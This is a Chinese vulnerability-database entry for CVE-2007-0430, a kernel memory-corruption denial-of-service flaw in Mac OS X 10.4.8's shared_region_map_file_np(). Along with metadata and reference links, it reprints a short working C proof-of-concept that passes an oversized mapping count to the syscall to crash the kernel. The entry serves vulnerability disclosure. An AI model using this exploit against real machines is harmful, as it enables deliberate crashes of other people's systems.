Apple Mac OS 内核 shared_region_map_file_np() 拒绝服务攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112056 漏洞类型 未知
发布时间 2007-01-21 更新时间 2007-01-22
CVE编号 CVE-2007-0430 CNNVD-ID CNNVD-200701-357
漏洞平台 OSX CVSS评分 4.9
|漏洞来源
https://www.exploit-db.com/exploits/3167
https://www.securityfocus.com/bid/81986
https://cxsecurity.com/issue/WLB-2007010093
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-357
|漏洞详情
AppleMacOSX10.4.8及之前版本的内核中的shared_region_map_file_np函数存在拒绝服务漏洞,本地用户可以借助一个大的mappingCount值,引起拒绝服务攻击(内存破坏)。
|漏洞EXP
/*
This vulnerability was discovered by Adriano Lima
<adriano@risesecurity.org>.

REFERENCES

[1] Mac OS X Internals: A Systems Approach By Amit Singh

DISCLAIMER

The authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of the information provided in this
document. Liability claims regarding damage caused by the use of any
information
provided, including any kind of information which is incomplete or
incorrect,
will therefore be rejected.
*/


#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <unistd.h>

int main(int argc,char **argv){
   int fd;

   if((fd=open("/usr/lib/libSystem.dylib",O_RDONLY))==-1){
       perror("open");
       exit(EXIT_FAILURE);
   }

   if(syscall(SYS_shared_region_map_file_np,fd,0x02000000,NULL,NULL)==-1){
       perror("shared_region_map_file_np");
       exit(EXIT_FAILURE);
   }

   exit(EXIT_FAILURE);
}

// milw0rm.com [2007-01-21]
|受影响的产品
Apple Mac OS X 10.4.8
|参考资料

来源:BUGTRAQ
名称:20070119[RISE-2007001]AppleMacOSX10.4.xkernelshared_region_map_file_np()memorycorruptionvulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/457466/100/0/threaded
来源:XF
名称:macos-sharedregionmapfilenp-dos(31645)
链接:http://xforce.iss.net/xforce/xfdb/31645
来源:OSVDB
名称:32942
链接:http://www.osvdb.org/32942
来源:VUPEN
名称:ADV-2007-0275
链接:http://www.frsirt.com/english/advisories/2007/0275
来源:SECTRACK
名称:1017538
链接:http://securitytracker.com/id?1017538
来源:SREASON
名称:2178
链接:http://securityreason.com/securityalert/2178
来源:SECUNIA
名称:23823
链接:http://secunia.com/advisories/23823
来源:MISC
链接:http://risesecurity.org/advisory.php?id=RISE-2007001.txt